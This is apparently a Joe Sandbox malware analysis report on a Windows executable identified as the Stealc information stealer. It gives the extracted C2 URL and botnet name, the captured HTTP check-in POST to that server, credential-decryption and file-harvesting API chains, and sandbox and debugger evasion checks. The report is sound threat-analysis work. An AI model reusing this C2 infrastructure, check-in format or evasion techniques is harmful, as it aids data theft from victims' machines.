Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1542683
MD5:23f03176ddc56b4e531545aaf7394334
SHA1:56dffc71067b0d3896a2fba82b320d8b7f18782e
SHA256:da968f12344c3ccfdfa40421c3688c1761a2ff5054b353582022016e0a05fbe4
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3184 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 23F03176DDC56B4E531545AAF7394334)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2135381078.0000000004FA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3184JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3184JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.e90000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-26T07:11:01.630432+020020442431Malware Command and Control Activity Detected192.168.2.649709185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.e90000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 44%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00E9C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E99AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00E99AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E97240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00E97240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E99B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00E99B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00EA8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EA38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EA4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E9DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E9E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00EA4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E9ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E916D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00EA3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E9F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E9BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E9DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E9DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49709 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 38 41 41 38 34 45 41 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="hwid"C8E8AA84EA5B340779059------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="build"puma------DGHJECAFIDAFHJKFCGHI--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E94880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00E94880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 38 41 41 38 34 45 41 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="hwid"C8E8AA84EA5B340779059------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="build"puma------DGHJECAFIDAFHJKFCGHI--
                Source: file.exe, 00000000.00000002.2175832040.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/3
                Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/M
                Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php-
                Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/D
                Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php4
                Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpT
                Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpl
                Source: file.exe, 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpt
                Source: file.exe, 00000000.00000002.2175832040.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012511390_2_01251139
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0125990A0_2_0125990A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012639120_2_01263912
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0125E8260_2_0125E826
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0125488C0_2_0125488C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0113032F0_2_0113032F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0119BB7F0_2_0119BB7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012563BA0_2_012563BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0125B3D70_2_0125B3D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124DA860_2_0124DA86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124F5ED0_2_0124F5ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01252C3F0_2_01252C3F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0124BF920_2_0124BF92
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01163E110_2_01163E11
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E2E080_2_011E2E08
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0125CE4F0_2_0125CE4F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01257EBF0_2_01257EBF
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E945C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: nnbmymfp ZLIB complexity 0.9949252187786609
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00EA8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00EA3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\A37PY4PZ.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeVirustotal: Detection: 44%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1830912 > 1048576
                Source: file.exeStatic PE information: Raw size of nnbmymfp is bigger than: 0x100000 < 0x198e00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e90000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nnbmymfp:EW;onazwdcw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nnbmymfp:EW;onazwdcw:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EA9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1bf258 should be: 0x1c46fa
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: nnbmymfp
                Source: file.exeStatic PE information: section name: onazwdcw
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push ebp; mov dword ptr [esp], ecx0_2_01251280
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push 57FEE43Ah; mov dword ptr [esp], eax0_2_012512D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push 4B699A9Bh; mov dword ptr [esp], edx0_2_0125131F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push 7E3607DAh; mov dword ptr [esp], esp0_2_01251358
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push 287BDF53h; mov dword ptr [esp], edx0_2_01251396
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push 233C371Fh; mov dword ptr [esp], edi0_2_0125144D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push eax; mov dword ptr [esp], esp0_2_01251451
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push ecx; mov dword ptr [esp], eax0_2_012514C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push 76815C61h; mov dword ptr [esp], edx0_2_012514D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push ecx; mov dword ptr [esp], eax0_2_012514FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push edi; mov dword ptr [esp], 4FDC77ABh0_2_01251507
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push ebp; mov dword ptr [esp], ebx0_2_01251526
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push 27ECCF0Fh; mov dword ptr [esp], eax0_2_0125156D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push ecx; mov dword ptr [esp], esp0_2_012515E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push 13B908A4h; mov dword ptr [esp], eax0_2_01251611
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push eax; mov dword ptr [esp], edx0_2_01251642
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push esi; mov dword ptr [esp], ecx0_2_01251683
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push ebx; mov dword ptr [esp], eax0_2_012516A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push esi; mov dword ptr [esp], 73F53585h0_2_012516B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push edx; mov dword ptr [esp], 27171827h0_2_012517CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push 1B89CF73h; mov dword ptr [esp], edi0_2_01251806
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push edx; mov dword ptr [esp], edi0_2_01251840
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push esi; mov dword ptr [esp], 751F2530h0_2_01251844
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push ecx; mov dword ptr [esp], 77C7069Bh0_2_01251944
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push ebx; mov dword ptr [esp], ecx0_2_012519C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push edx; mov dword ptr [esp], edi0_2_01251A3F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push esi; mov dword ptr [esp], edx0_2_01251AB3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push 6C1E87B1h; mov dword ptr [esp], eax0_2_01251ACD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push ebp; mov dword ptr [esp], edx0_2_01251BF1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push edx; mov dword ptr [esp], ebp0_2_01251C2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01251139 push esi; mov dword ptr [esp], edi0_2_01251C8C
                Source: file.exeStatic PE information: section name: nnbmymfp entropy: 7.953989385913713

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00EA9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13601
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F2342 second address: 10F2346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F2346 second address: 10F234C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F234C second address: 10F2350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1263430 second address: 1263436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267854 second address: 126785A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126785A second address: 126787B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F849C4F2DA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jbe 00007F849C4F2D96h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126787B second address: 1267881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267E8B second address: 1267E9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1267E9C second address: 1267EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F849CDA4206h 0x00000009 jmp 00007F849CDA4204h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F849CDA4202h 0x00000019 jns 00007F849CDA41F8h 0x0000001f rdtsc
